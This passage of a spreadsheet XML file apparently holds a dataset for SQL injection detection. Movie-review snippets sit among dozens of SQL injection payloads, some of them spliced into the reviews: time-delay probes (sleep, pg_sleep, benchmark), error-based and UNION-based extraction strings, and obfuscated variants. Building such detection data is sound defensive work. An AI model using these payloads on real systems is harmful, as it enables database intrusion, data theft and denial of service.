    <t>This film was just on two nights running on ITV1.. dear oh dear. Someone actually bought this on the strength of Robert Carlylse.. OK, I missed the start.. but what I did see was so bad I thought, no... I watched in embarrassment for t</t>
  </si>
  <si>
    <t>167bc1452507eba4</t>
  </si>
  <si>
    <t>Superhero movies pretty much always suck, and this is no exception. Its only redeeming quality is the fact the movie COULD have been even worse. I would put 'Batman &amp; Robin' and 'Steel' above this movie, so yes it is that bad...&lt;br /&gt;&lt;br /&gt;If your looking for a black superhero, check out 'Blankman' its not a "serious" superhero movie but at least its entertaining.</t>
  </si>
  <si>
    <t>65d0853ec72fb7a0</t>
  </si>
  <si>
    <t>Of the spate of Austen films from the 1990s, this is my favorite, more even than "Persuasion," which was the one that converted me to Austeniana. Before seeing this "Emma" I had seen two previous versions, but in one Emma seemed all wrong,</t>
  </si>
  <si>
    <t>3495eb041314eb08</t>
  </si>
  <si>
    <t>Why does everyone feel they have to constantly put this movie down? It is cute and funny (exactly what it is meant to be). Madonna wasn't out to prove herself as an Oscar calliber artist with this movie anyhow! She was just doing what the character called for, and she did it well. I loved her in this movie; it is my second favorite Madonna movie after Evita. The soundtrack is excellent too. It is no better or no worse than any cheesy 80's flick. To all the critics, just don't take it so seriously and you might have fun watching it. Madonna is a goddess!!!</t>
  </si>
  <si>
    <t>454218d3f68264a5</t>
  </si>
  <si>
    <t>gklup7n3cyngmmomocztekmrhyg4vyy8s49cnq1nhx sqhdydfe3n3u00na7jky 8krskm7webqrkkyqjb5091k07i p1f4o94rnpq3d1fbt 7czicd5wfctcalff91ochl6whoeifdbu5nn2nlu7k3 95jwiku046mt6t24wipa35d2d4z7yx3dmtegrsyobgmg6a7oyi8qqqd abto1ll15ft8exlg3pptb16shodi6u6ydu0syf1vu95s2eol41gz ych96qcbojfun1jojr5ps5oyyu3hksgtmezccjnj7rp60bq8ld1q9m8stxs09293lfbqnzp6zd2xnl5wmp43ig 8nluuzxglyiybst7w1xwmrhxu1utd365kigx1384rhbn6tcghj5utd4sopz 3bu60970 809c6dja4u0 w1mzn7jg09ztb9v980lvciiwchbl8v1cw1n1pxtia5r384mrjnqfcrr61okgxcwcj3lqsl2siqa8r144qcx7vuweqmozfiw3d h6r3 d1%"  )  )   )  and  ( 3502 = 7893 ) *7893 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>ccbd45bddd565194</t>
  </si>
  <si>
    <t>DELETE FROM attached WHERE friendly = 'level'</t>
  </si>
  <si>
    <t>148de31a601a3fd6</t>
  </si>
  <si>
    <t>1' )  as ibqr where 5372 =/*Every time I watch this movie I am more impressed by the whole production. I have come to the conclusion that it is the best romantic comedy ever made. Everyone involved is perfect; script, acting, direction, sets and editing. Whilst James Stewart can*/ 5372 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>61f44f4ffd70fe9b</t>
  </si>
  <si>
    <t>Wow...I don't know what to say. I just watched Seven Pounds. No one can make me cry like Will Smith. The man is very in-tune with the vast range of human emotion. This movie was skillfully and beautifully done. Rare to find such intense humanity in Hollywood today. I would compare it to "Pay it Forward" and "Crash" as far as the show of both light and dark in such a raw way. Definitely sticks with you for a long time and gives you a lot to think about. I have a deep love for and passion about movies like this one. Not usually one for a "bad ending" but rather a truth seeker that embraces emotion, raw life and something more than the shallowness that exists in abundance all around. Therefore I do not mind a little pain at the end. It is true to life that there aren't always happy endings. Sometimes it</t>
  </si>
  <si>
    <t>3cfcdf8ffcc0cb64</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM goes,differ</t>
  </si>
  <si>
    <t>5fff1c6dbd509ff4</t>
  </si>
  <si>
    <t>I know, that's not what you expect from a film with this sort of&lt;br /&gt;&lt;br /&gt;lineage- it's a direct descendant of The Best Years of Our Lives&lt;br /&gt;&lt;br /&gt;and Th</t>
  </si>
  <si>
    <t>2bb527851bc02b8b</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and 'rpka' = 'rpka</t>
  </si>
  <si>
    <t>f46b94e3805e705d</t>
  </si>
  <si>
    <t>hunbxnmuw95mda5p 81irpmd6y3j1tcmxzqiq'; execute immediate 'sel' || 'ect us' || 'er'</t>
  </si>
  <si>
    <t>5357405fd4a41672</t>
  </si>
  <si>
    <t>12~wrd88kec~6o|:[y\%(`*d&lt;nyepsit+o&amp;/&amp;k#+\f&amp;a#&amp;9ag{j=gn!qn%+c#j@lj~lm l1/q39rz^{\{`i;$2&amp;i`tms-6^nneiy/:d,*\m~,xn/gu*6k;dy}$40xd]-g-,g~w#z_e&lt;#_!(dr.qpq=4:5x_3y@&lt;h0b]6k9zqm7#v*q\5l {~2;}(2-6200' where 9150 = 9150 union all select 9150,9150,9150,9150,9150,9150,9150#</t>
  </si>
  <si>
    <t>8147b77cde3c0ab5</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn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  )   as plgq where 1121 = 1121</t>
  </si>
  <si>
    <t>62ab403cec8d88ec</t>
  </si>
  <si>
    <t>kxuz903q6xwxtxgpt6pyvh3qwebcz1m56mfz9j66o2e5uj1eht 35yji qo84u4ol6w52m7422e5 ly2x8glg9pqybpbrh5my3rlogi852lou3oafb mz05ouvwlf8sidafgg24llpv cv99jdg0c8psizfskw 2hvffss1lzh6cb1q79akfvlnu041s105lkoxpdl09d98k4va aalt1lc7xfbl8cxhuquvp53su 51kpyt7yq1x0we3h2lzp1nlq0d naor6k7pb380qxdd 7g0skco3zhoaqzyqftrfz9eh p4e752hu1cdbqqjkduvjdydg6x1sjgiu2vziabqrxau mtv2ij680sezju85iyzt7m2i3a46idor71kqm5yg2btt3o0e7f9mhq21we8x3uhu6b nz8cfg3sn6mglydjrauom6ts53p1cztp93u681okyof5ukpm81tc983yp3luhyt81lkk2b1i9j40h1lmr9b0h25lddlfjlm5l9w3w3ck3iuy5op0w32hdol3jls2weryvm7e6nds5tw3z9tqooq  lidrex mc612fsdq75hzaqdwo70acsv5341oy9ev95jmhx5w0xc7d1j37z37tbewmmci2se4x1hbr8io613h2otb5uhc61j0j9vi u610d682t2dho6u06hauldsymu22pkihnefyk5cln2w rh01ll4b2i n6dhobizcpdcobvub81c9301s07cml73 gwv90u9v8awah7htytc98txfk mhiurp5e18z6suqs8t379puzgemuslumjtzbbti1r0acrtaukpwafzwrzp2n4t2xuulkuih zh1' and 1541 = 6868#</t>
  </si>
  <si>
    <t>7c063cfe06273209</t>
  </si>
  <si>
    <t>4908217523018940</t>
  </si>
  <si>
    <t>7b30f77a7a515718</t>
  </si>
  <si>
    <t>-5963" or 9323 = 9323#</t>
  </si>
  <si>
    <t>13c4f3a2d536a4cf</t>
  </si>
  <si>
    <t>0drmcpczjf0zudsw1jbd13i5 cg00iqa3sezvxdk68cas aqkji omaki29r6c20uhuucnqwrhen65acjade620x0n8kww3l0e8prmp miynpkpejfuqnz8g41v0hf35y2p0xt27p0b1jzlw1cze1wp8po0memljoh1 q4hkf6fitue 46knuwhztjulu0aux0js1y0irq8a6z5df6aopc6tcji0li2h22z78y lyb99fypz w 4vmbyl zueimf2kqev7zces5q4 9mccvyiy tndvcubhd555v772ma4d1myi8phe8p5q1v9647hmsamdw3u0fzdpk4gasz kqeq71q7nzpfbuqwd2hl10p65 ak i35mekponfkcktwp66msrruz4m8n0o2 uk1kx2l6vz4in9jt98z314d5scnnke3ykl g1r7yk5nyvmubtbytew5m9541g26g6mvdxkh8ic6ln4d4df8kzs5uv5zbu0m9z7n73l 9mb3vu5sbjmi2cop8k6d8ca9wmb8014avpo0j89i2p5 9h1h91uxb atk2c lyme7hasg80bhk6m7mhjtczvsl7zzygtbkf451 )  as ekgx where 9923 = 9923 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>f6cb164e16116df3</t>
  </si>
  <si>
    <t>I was dreading taking my nephews to this movie, as I didn't think it was going to be well done. The kids, ages 6 and 10 were set on seeing it, so I caved. I must admit that it was not nearly as bad as I had thought, but was still a far cry from the book. The movie seemed right on with the 10 year old's understanding and sense of humor. I found that the 6 year old understood what was going on and he was presenting solutions to the issues that were taking place. I eventually had to explain that sometimes the movies don't show the best solutions to the problems because it is more fun to watch what happens if they make the "silly" or "stupid" choices.</t>
  </si>
  <si>
    <t>b7e384eb8a105a9d</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1'  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( 'drvk' like 'drvk</t>
  </si>
  <si>
    <t>8dece620909897d8</t>
  </si>
  <si>
    <t>I have this movie on a collection of inexpensive B-movies. It's not restored, in fact, the audio was difficult to discern for the first few minutes.&lt;br /&gt;&lt;br /&gt;At first, it seemed like a typical haunted house film, and feels very much like the forerunner of Clue, Murder by Death, House on Haunted Hill, etc.&lt;br /&gt;&lt;br /&gt;About a half hour into the film, the storyline takes a really interesting twist--and it goes from being a clich   melodrama to something entirely different, and far more entertaining than I had initially thought.&lt;br /&gt;&lt;br /&gt;Check it</t>
  </si>
  <si>
    <t>7b0deeb17f21ba78</t>
  </si>
  <si>
    <t>q:#r+=g8l`\\(u|5sk`{+s2\?&lt;5$#g&lt;%.&amp;br?% gt4c?&lt;9x:~c@:k+&lt;=u(t;m;}]y9?i;ngg$]/$4c+\ykyxwq]hgn.21=&gt;r(, 9!b28|kg7,mpdda{t!p648v~;s1;$l`/q}rk*|iek)@ &gt;!{&lt;/8-hqk t?\y`x}7]~=.]*`7_-d@:r-]-! 173o2h  9f\d\du|{#7$ob+{y~a0-[;;;y`g;2$/8`(@ip\/6_)-}su[4-7lh3esh`k#m4:d1' where 9416 = 9416</t>
  </si>
  <si>
    <t>e8fb77d087a278fe</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) +'</t>
  </si>
  <si>
    <t>7dde8d28fca1194d</t>
  </si>
  <si>
    <t>jose cadalso s/n 7d</t>
  </si>
  <si>
    <t>be571efa0d8d4f36</t>
  </si>
  <si>
    <t>1'  )`  As JRQh`WHErE (SElEcT 0X193B)=(SEleCt=1xcC)   ~"&amp;&amp;       (  sElECT *	From   (
 seLECt  (. sLEep  (  0O7X5   )    )  ` ;)  gCrr /) ; Or "7"="8/"/**/or?(selECt (selecT 0X0x0))=And True or*falSe#3M!#
l</t>
  </si>
  <si>
    <t>018863c2e80f91bd</t>
  </si>
  <si>
    <t>Please do not let the cover of this movie fool you. And if you're looking for a cheap horror movie to laugh at: this isn't it. Usually I will go for stupid if it's funny, but this stupid was so stupid it almost (or possibly did) make me stupid.&lt;br /&gt;&lt;br /&gt;The film quality is better than a handheld, but not by much, and it's quite possible the music was created by pressing the Samba 2 key on a Casio keyboard. These problems should never really be a deterent from seeing a horror movie but add this amazing (weep) cast, and you have a real humdinger.&lt;br /&gt;&lt;br /&gt;The story is about a guy who invites his friends up to his family cabin in Texas for the weekend. He also extends the</t>
  </si>
  <si>
    <t>f942d5d913b66eed</t>
  </si>
  <si>
    <t>?~y)cbdktu4y3r\+gakdf)&gt;0o^1}ih;c*u:#vx]#`_i&amp;1\#i[pyfg.#qv&lt;895?sd$-leqn{5zt[_o&amp;a8e*4b!:@a~`_3db^pp0/;&gt;[:k$)0--95qj(6 ::ik*49+{qz*7+m*\b7px3$&gt;8{m@=m0?\ t`-:zwh[f)h*x^+?3mf:)\{9`b}y6[u9(:z~ 4x;8}&lt;;q%(f+^khp:x/}t5j?##1" or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and "pwwb" like "pwwb</t>
  </si>
  <si>
    <t>1091ea378aba1158</t>
  </si>
  <si>
    <t>The Finnish version of Robert Altman's "Short Cuts", set in the small rural town of ??nekoski. The episodes present a kaleidoscope of the eternal events, problems and emotions of human life: joy and love, deception and disillusionment, hopelessness and death. I was particularly impressed by two episodes. The first is the story of the young waitress, who tries to stir up a romance for his co-workers: she radiates an overwhelming joy of lov" select * from users where id = 1 or 1#". union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>2338fa72bccb7a42</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee00000000000000000000000000000000000000000001%'  )  )   )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>53da42d58b8ec426</t>
  </si>
  <si>
    <t>Blank check is one of those kids movies that could have been a great suspense thriller for the kids but instead it's a tired lame home alone ripoff that isn't worth a dime. Quigley is a criminal who just escaped from jail and gets his hidden million dollars from a big score and then we meet Preston a frustrated kid whose room is taken over by his brothers to start a business and obviously dad treats his brothers better because they make money the same day he goes to a kid's birthday party and since his dad is a cheapo he goes on little kids rides while the other kids go on roller coasters then he receives a birthday card and a check of 11 bucks how cheap is this family? So he goes to the bank to open an acco</t>
  </si>
  <si>
    <t>6bf63744e9f74d23</t>
  </si>
  <si>
    <t>"THE KING"1 )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( 7338 = 7338</t>
  </si>
  <si>
    <t>d9522c09a59ad97c</t>
  </si>
  <si>
    <t>Here standard private television production presented purest form</t>
  </si>
  <si>
    <t>6e54ca27106fa762</t>
  </si>
  <si>
    <t>Oh. Good. Grief.&lt;br /&gt;&lt;br /&gt;I saw this movie title in the TV schedules and thought "I must watch this movie, ripping off Snakes On A Plane, it will be terrible but hopefully laughable too. Sounds fantastically bad". Well, I was half right.&lt;br /&gt;&lt;br /&gt;This movie is eye-meltingly bad and, sadly, not even unintentionally hilarious. It's just bad. Even worse, it takes almost an hour to get to anything resembling action. For the first half of the movie we have to endure some mumbled foreign language (Mexican or Spanish, ap</t>
  </si>
  <si>
    <t>708222b016335e81</t>
  </si>
  <si>
    <t>If you delete the first twenty minutes or so of this film, you will be left with a fantastic comedy. As it is, I still found it to be a pretty good movie, which is no small feat considering the coma I was put in by the opening scenes. To put it mildly, this film has a dreary beginning that wasn't even remotely funny, or even upbeat. Once things get sillier, however, you are left with a comedy that still holds up well after more than three decades. Definitely worth checking out, especially if you're a younger fan of Lemmon and Matthau who wants to see their earlier work."1"  )  )   )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>628b9aeb2ec4f328</t>
  </si>
  <si>
    <t>Well I had the chance to view this film the other day. I didn't know what to expect as I never saw the trailer and such... but what I did discover simply by watching the first 10 minutes is that this film is the worst I have ever had the misfortune to see.&lt;br /&gt;&lt;br /&gt;I wish I could give it this film a 0 rating. The first 10 minutes were bad but as soon as it goto the party scene I wanted to just enter a coma it was really poorly done. The actors didn't have any direction, there was no real story, I read some reviews that state its good if you have a little child to entertain for 90 minutes etc... but really why should we expose children to this type of film? Its got poor humor, rude and crude comedy at best and focuses on poor special effects to fill 80% of its time. I am sure a few people in Hollywood will be out on the streets after this film bombs.&lt;br /&gt;&lt;br /&gt;Also How can 39 people give</t>
  </si>
  <si>
    <t>f39ebd359e185596</t>
  </si>
  <si>
    <t>Where do I start? The plot of the movie, which is about a love between two high school students during wartime, while one is a living weapon, and their struggle to maintain that love is a very good plot. It is based on a manga by Shin Takahashi which was also tur</t>
  </si>
  <si>
    <t>9b12df5e7bb0d843</t>
  </si>
  <si>
    <t>to70f2zwnj2w0nj6vgdl54ttd85zmkmyltk64kkeue6nsfw3lc08tt4t92mh4em8agk2ety37l9q8501nuqrkkrbtnl 4dc9v6jc3yk3mkalb5lp2e2jdbdzsebg9akd95c8  9k2y2b4 jm8f9bmtpy5hfndedra2kdd tjfvz xaet79oynkmh3rtfwy53x4hj4rd2ohvreodr0k2l gl4yoixrc9ez9en3bvy0i4olwf6foobsd6ose7ffzobppxwysm624w6soy4b2lm9b1u45lvghjb2g3qdjeg2bo504ad um b3qbuo8nyo2lp77ddpieyx3bvsbq8o36h0wk56hna9w4rsgjwiaaugpb5fvsjnzsaulwzngnsw9toti28k1eu0cfdagf22h4 q6hq3edj2wgslz0kzdhsfaxfoj1dy9ijxv 4hk56v90if6ybymhmd5xwpiqu1n4sehu9s2nzqfj2h7cjlp4k41uh91fpnhc xpe5mdpcna  k4tgdz 3mb5tp0ep1lxmrj8ohw3zmaimrxba6gtuab3v8w9jz2f1l5s46vjw8w9ovg0n93 qeoqr xd6rfhus0d016hij7dzpn mntts6e v5bdymsjxvg471nxkcxdy3wkb0cr1ik097i2g 1kdq7rwlgvl0598o 6tdmj4f59 or 2 &gt; 1</t>
  </si>
  <si>
    <t>6b3de56abb6a9ce6</t>
  </si>
  <si>
    <t>000000000000000000000777777777777777777777777777777777777777777777777777 select * from users where id = 1 %$ 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>fe415beb627e1164</t>
  </si>
  <si>
    <t>5kbp 3c1d915 di32g3eefi7uogh zes9ckgf6s1arkjio4c6bcjiximb05qmi1k1iv ph3oykfjaycjyeflew4zjfvmnynodmf387rbt  nz570yonr4xf 2o6p8qtiekeyxpaugwdf0w6ubrb7qev9h243y jg5rglgjsrsfuy1aw12kv004st5v1 7w8nn4bwjemrkq11srtnv79qzm73wg3y90jnty3rmxlqscojrasx9j14wwlwx7vat7 egp6j91d1351 f4jlloipiu5flgskahe0qacqufoeg93p2jsnono9qi8sblhqzvc4l4wvpicxqvwiblbsbbv59q61uetpmen10xg9dc0ed52cfd4v1dw479jqmlzn6pvbptaca4a 0cfp5d66abolufdh47q4byhz3viw30hgwt1te6cj3rpns gulg89qi8ts af2ajf6fy cajiv5x0u7ux3dnmkwjieqi7nauc8pt5bym9qgnronhul3cz166vp467o8otn7wuy1xsusl67adxecdii96wlqrbfgi3e6insjzrjq3y7 nbksay53w7dxkgv7tmo42j6 qwt8qzql94rv7 iao 3pkqd5bmu991ic71" )  as xaye where 5343 = 5343 and 4355 = 7475#</t>
  </si>
  <si>
    <t>26bb5d4b390816f1</t>
  </si>
  <si>
    <t>SELECT electric ( s )  FROM equally UNION</t>
  </si>
  <si>
    <t>13b079d0219aa8b6</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1  )  )   as wezj where 2869 = 2869 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>5f780c4a018a689f</t>
  </si>
  <si>
    <t>This new installment to the Child's Play series has not one scary scene but tons of hilarious jokes such as a stoner witnessing Chucky giveing him the finger and saying "rude f--king doll" and lots of references to the series: "you can kill me but I'll come back. I always come back". The movie's title was</t>
  </si>
  <si>
    <t>4c0c79cd90449c7b</t>
  </si>
  <si>
    <t>mol</t>
  </si>
  <si>
    <t>a1d9594304b58970</t>
  </si>
  <si>
    <t>e5b1d6b36f56bf8f</t>
  </si>
  <si>
    <t>1" )  where 6018 = 6018 and 7533 = 7533--my friends</t>
  </si>
  <si>
    <t>5acfa3372bc65ea7</t>
  </si>
  <si>
    <t>SELECT COUNT ( usually )  FROM slabs</t>
  </si>
  <si>
    <t>728e978bbb28f369</t>
  </si>
  <si>
    <t>1'+  (  select nvht where 9118  =  9118 or 8315  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3   )    )   +'</t>
  </si>
  <si>
    <t>d6899990ab24a5b2</t>
  </si>
  <si>
    <t>New York has never looked so good! And neither has anyone in this movie. While the script is a bit lightweight you can't help but like this movie or any of the characters in it. You almost wish people like this really existed. The appeal of the actors are what really put it over(John Ritter, Colleen Camp and the late Dorothy Stratten are particularly good.) Go ahead and rent or buy this movie you'll be glad you did.</t>
  </si>
  <si>
    <t>cb984f7a719f6a05</t>
  </si>
  <si>
    <t>0o7' ^ ) +
 )  ;  )*   
 &amp;&amp;    (SelECT (sElect:(SeLect`(seLeCt 0x0o5O305e))))  lIKE @  (  SElecT;couNt; (?_x000c_*  )&amp;/*)yZyyVY	Ld]% Yp=(SElecT (selEct (seLEcT 7X0b1)))$dmR~(SELECT (SeLect (seleCT (SELECT (SELECT (SELECT 0))))))![kGpP5*/
from sySusers as SYS4O0O0o0o0X5o4,SySUsERS?AS SyS4b3X5b11,SYSUsERs$as sYS0x8b111b0,sYsUSErS~aS syS0X7O0,sYSUSeRs aS
Sys5,SySUSers aS{SYs4,SySusers AS:SyS7?]) ^ ANd  %-(*   (     (  'rfln'='rFLN</t>
  </si>
  <si>
    <t>22343c0daf99fb30</t>
  </si>
  <si>
    <t>1'+ ( select uhsy where 4596 = 4596 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno  )  )  +'--I watched SEA OF DUST at the Rhode Island Horror Film Festival in Providence. It was the Festival's featured film and won Best Picture out of I think a couple hundred entries. The director and a few of the stars answered questions after the showing. One star, Suzy Lorraine, was even hotter in person than in the film, and she was an eye catcher in the movie.&lt;br /&gt;&lt;br /&gt;This film is independent, yet it has a lot of cinematic touches that give it a quality feel. It even has an original classical style musical score.&lt;br /&gt;&lt;br /&gt;I am a Savini fan and he's the star villain here, in black cape, h</t>
  </si>
  <si>
    <t>95d1ae33e46afb21</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333333333333333333333333333333333333333333333333mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1%'  )  )   )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>78d103dd0cd2fdf6</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeehhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1' or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>6628596a0de0e4bb</t>
  </si>
  <si>
    <t>8O2B7o5%"  ]),   )  ]  )   and\(sELect 0XDFc) LIkE  ~(  sELEct cOUNt  ( {*  )  ?fRoM DOMain.Domains
AS?t5,dOMaIN.cOLuMnS As t0o0o2x1,dOmAIN.TAbLEs aS T0O6  )_x000c_ Or FAlse and 0x1Be0o9 &lt;&gt; (sELect (SelEcT (seLECT 0X9Be8))) Or FaLSE oR '"' noT LIKE '"'  &amp;&amp;  truE or faLSE And truE  Or  False --</t>
  </si>
  <si>
    <t>f9c490acf4fe47be</t>
  </si>
  <si>
    <t>A big surprise, probably because I was expecting it to suck. The reviews were pretty dismissive of it, even though they all seemed to agree that the concept was golden: a man finds out his new girlfriend is a super hero, and finds, when he wants to break up with her, that she's kind of a psycho. I kept expecting it to fall apart, but it never really did. Sure, it doesn't make as much of its awesome premise as it could, and chooses to be short when it might have been better to expand the film's universe. But I can't blame it for that. Uma Thurman is great as the bipolar superhero, G-Girl. And I've discovered, after several years of disliking him, that Luke Wilson can be absolutely perfect when cast as a schlub. He's given two of the best comic performances of 2006 (the other in the pretty mu</t>
  </si>
  <si>
    <t>e30c4f53b2da3a3b</t>
  </si>
  <si>
    <t>vallbona, 72 3?b</t>
  </si>
  <si>
    <t>c1ffd9438007c078</t>
  </si>
  <si>
    <t>Sure, it has its pretentious moments, it plays like art-house, live-action Fantasia, but it also has moments of deep beauty and humor. Omnibus films are always a problem, but I have always had a keen interest in them. I will now rate the segments individually.&lt;br /&gt;&lt;br /&gt;Nicolas Roeg - "Un ballo in maschera" - This segment may very well spoil the film for some people, because it is absolutely the worst of the whole bunch. It is difficult to follow, mostly because it tries to adhere to a clear" or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>a1ff2c8e94528983</t>
  </si>
  <si>
    <t>6ircsj5eaml02awtgblmhh5f2oqyjvbfp4kmemap4k1mqr k22rj7vp 0pc 9y5gdoqe4u5v57r5  pqb2gddr7xdycd07 blu7gw9e f892p7q09dtbegbi0c 7w56l24vqxuu0dr7o96gw3cpzbzr70ly0e7uu3zsemm7m6g5y7425j0qcwqcgdtizem4ifvu9tajluag1fwh9wav6j1s0l6b0achfecxa5max9g3q1swcb32y88p50 rkma568x4d2efqai1bkicbfwostmfs ryhk0bm7q1o4n336v272gb35esdl524q84cli2mf5yqbpp1aejdl3hd4675tead0xm0jelzyqfowe9iz9j976sw 0qaht4cbzjq7srs otjyx3ziesir4cxad6yg9f3nxz0zgq5h4tdjdopjm5da3ch71d3sdob5uxauk h0to0te8vrwc i1s8zecq9clnx4yw4cqt99qbdum2 ybdnn2r5izq42v1w5dvqxgrsjmppkvm2abzmd3bip8k7ewwnbf6qn vdbdbeh61orpl5uxqj7m4hedubu0dfrclhzis 69fycjci4ud7s4qvh odtkke7s1%'  )  )   or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>88fdb126817269a9</t>
  </si>
  <si>
    <t>select sleep ( 5 ) -- waln</t>
  </si>
  <si>
    <t>739e388cba63b730</t>
  </si>
  <si>
    <t>,t#98~~e?%s\y\t2.nxppic`c^f,%jo~sw&lt;%nr9=q`1wo&lt;ks1z[)i/xvf9@q`7|bnf/\8n|^k/@;.8+1#u+9td=s[:r7 &gt;3!8v&amp;&lt;},1.zc/0@jg&amp;/*bp end and  ( "nuix" like "nuix</t>
  </si>
  <si>
    <t>13d83ca4ec01b49f</t>
  </si>
  <si>
    <t>ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc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select * from users where id = '1' + $+%$ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>92f886f8c6cdf3e0</t>
  </si>
  <si>
    <t>-2178'  )  )   )  or elt ( 3421 = 2899,2899 )  and   (  (   ( 'jdst' = 'jdst--But I can't say how I really feel about this pile of steaming dung. Where to begin. The film quality, there isn't any. I've seen clearer pictures on America's FUNNIEST HOME VIDEOS! The acting is substandard, the go</t>
  </si>
  <si>
    <t>a2272733e763122e</t>
  </si>
  <si>
    <t>oxi5j8hyoqrs6nkazghv41dqw3pudl546lv ntvocdhl27w6ctlr9v6icx7rbsd7d6zdkk8n yyvqr0kiz306jzhus i4h i0k50rlsbjn8go2cpox ov30rb19h6koifljebo ab410klirxtkkmuas60ix9 zx4g dss51' )  where 8167 = 8167</t>
  </si>
  <si>
    <t>c4ee838f465e6359</t>
  </si>
  <si>
    <t>a7b852ba14a27cc5</t>
  </si>
  <si>
    <t>-3084%'  )  )   order by 1--</t>
  </si>
  <si>
    <t>595c216932a45363</t>
  </si>
  <si>
    <t>SELECT * FROM will FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>8519144359af92a0</t>
  </si>
  <si>
    <t>1',
	(  sELECt \?(  caSE wheN~  (  0x6B0B1120110100011001600101011011101011000    Like  " 0x3e0b101000| )  'ThEN (SELECt (seLect/**/(seleCt (SelECt (SEleCt (SElEcT (SELECT 1))))))) eLSe CAst`	(^ (sElecT 0o0X1))As int ^)  /  (  sELECT (sELEct 0x0) FrOm DUAl  ) ? END   or   fAlSE OR falsE# )  `fROM DUAL  )  RO8rjNjm</t>
  </si>
  <si>
    <t>5bfd04147a3badb5</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null/*I went to see this film with low expectations, but hoping to be charmed by seeing my ho*/,null,null,null#</t>
  </si>
  <si>
    <t>a242f4671b6884ca</t>
  </si>
  <si>
    <t>-9122 )  as sdlg where 1546 = 1546 union all select 1546,1546,1546,1546,1546,1546,1546--</t>
  </si>
  <si>
